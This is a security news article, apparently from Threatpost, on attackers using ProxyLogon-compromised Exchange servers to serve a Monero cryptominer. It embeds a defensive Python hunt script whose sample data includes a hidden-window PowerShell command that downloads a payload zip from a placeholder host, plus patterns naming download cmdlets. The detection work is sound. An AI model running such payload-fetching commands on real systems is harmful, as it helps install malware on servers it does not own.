
Attackers Target ProxyLogon Exploit to Install Cryptojacker
2021-04-15 12:19

Cryptojacking can be added to the list of threats that face any unpatched Exchange servers that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.

Researchers found threat actors using Exchange servers compromised via the widely publicized exploit chain (one that had already drawn a barrage of attacks from advanced persistent threat groups, infecting systems with everything from ransomware to web shells) to host Monero cryptomining malware, according to a report posted online this week by SophosLabs.

"An unknown attacker has been attempting to leverage what's now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server," Sophos principal researcher Andrew Brandt wrote in the report.

The attack observed by the researchers began with a PowerShell command that retrieved a file named win_r.zip from another compromised server's Outlook Web Access logon path, according to the report. In other words, a server that had already been taken over through ProxyLogon was serving the payload from its own OWA directory to the next victims.
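As an added illustration (not code from the Sophos report or the Threatpost article), the following Python hunt looks for the two sides of the retrieval step described above in logs a defender already has: the IIS logs of the Exchange server that is serving a payload out of its OWA logon path, and the process or script-block logs of the server that fetched it with PowerShell. The log lines, hostnames, IP addresses and command lines are constructed for the example; the actual command line the attacker used is not reproduced here, and the extension lists are a starting point rather than a complete allow-list.

```python
import os
import re
from urllib.parse import urlparse

# Constructed IIS W3C log lines (not from the report). Field order follows the
# default Exchange IIS logging layout: date time s-ip cs-method cs-uri-stem
# cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status.
IIS_LOG_LINES = [
    "2021-04-10 03:12:07 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.example.test%2fowa%2f 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200",
    "2021-04-10 03:12:09 10.0.0.5 GET /owa/auth/15.1.2176/themes/resources/favicon.ico - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200",
    "2021-04-10 03:14:41 10.0.0.5 GET /owa/auth/win_r.zip - 443 - 198.51.100.23 Mozilla/5.0+(Windows+NT;+Windows+NT+10.0;+en-US)+WindowsPowerShell/5.1.19041.610 200",
    "2021-04-10 03:15:02 10.0.0.5 POST /ecp/y.js - 443 - 198.51.100.23 python-requests/2.25.1 200",
]

# Constructed process command lines, as a 4688 or script-block log would carry
# them. Hostnames are placeholders; the real attacker command is not reproduced.
PS_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -c Invoke-WebRequest -Uri https://mail.victim.test/owa/auth/win_r.zip -OutFile C:\\Windows\\Temp\\win_r.zip",
    "powershell.exe -c Get-ChildItem C:\\inetpub\\logs\\LogFiles",
    "powershell.exe -c Invoke-WebRequest -Uri https://www.microsoft.com/download/x.msi -OutFile x.msi",
]

# File types the OWA logon path legitimately serves (web assets only).
BENIGN_OWA_AUTH_EXT = {".aspx", ".css", ".js", ".png", ".gif", ".ico", ".svg",
                       ".woff", ".woff2", ".ttf", ".eot", ".jpg", ".htm", ".html", ".xml"}
# File types that have no business being served from there.
HOSTED_PAYLOAD_EXT = {".zip", ".7z", ".rar", ".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs"}

DOWNLOAD_CMDLET_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|Start-BitsTransfer|"
    r"DownloadFile|DownloadString|Invoke-RestMethod)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def parse_iis_line(line):
    """Split one W3C log line into the fields the hunt needs; None for headers."""
    fields = line.split(" ")
    if line.startswith("#") or len(fields) < 11:
        return None
    return {
        "method": fields[3], "uri": fields[4], "client_ip": fields[8],
        "user_agent": fields[9].replace("+", " "), "status": fields[10],
    }


def find_owa_auth_payload_fetches(lines):
    """Server side: successful GETs of non-web files under /owa/auth/.

    A hit means this Exchange server is handing out something from its logon
    directory that OWA never ships, i.e. it may be the hosting server.
    """
    hits = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None or rec["method"] != "GET" or rec["status"] != "200":
            continue
        path = rec["uri"].lower()
        if not path.startswith("/owa/auth/"):
            continue
        ext = os.path.splitext(path)[1]
        if ext in BENIGN_OWA_AUTH_EXT:
            continue
        scripted_client = "powershell" in rec["user_agent"].lower()
        severity = "high" if ext in HOSTED_PAYLOAD_EXT or scripted_client else "medium"
        hits.append({"client_ip": rec["client_ip"], "uri": rec["uri"],
                     "user_agent": rec["user_agent"], "severity": severity})
    return hits


def find_owa_auth_download_commands(command_lines):
    """Client side: PowerShell download cmdlets whose URL points into /owa/auth/."""
    hits = []
    for cmd in command_lines:
        if not DOWNLOAD_CMDLET_RE.search(cmd):
            continue
        for url in URL_RE.findall(cmd):
            if "/owa/auth/" in urlparse(url).path.lower():
                hits.append({"url": url, "command": cmd})
    return hits


if __name__ == "__main__":
    for h in find_owa_auth_payload_fetches(IIS_LOG_LINES):
        print("served payload:", h)
    for h in find_owa_auth_download_commands(PS_COMMAND_LINES):
        print("fetched payload:", h)
```

Run the first function over the IIS logs of every Exchange server in the estate, not only the one that raised an alert: in the case described above the hosting server and the newly infected server are different machines, and the hosting server is itself a compromised box that still needs patching and cleanup.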

The ProxyLogon problem started for Microsoft in early March, when the company disclosed that multiple zero-day exploits were being used in the wild to attack on-premises versions of Microsoft Exchange Server.

Chained together, the flaws give an attacker pre-authentication remote code execution, meaning a server can be taken over without any valid account credentials.


News URL

https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/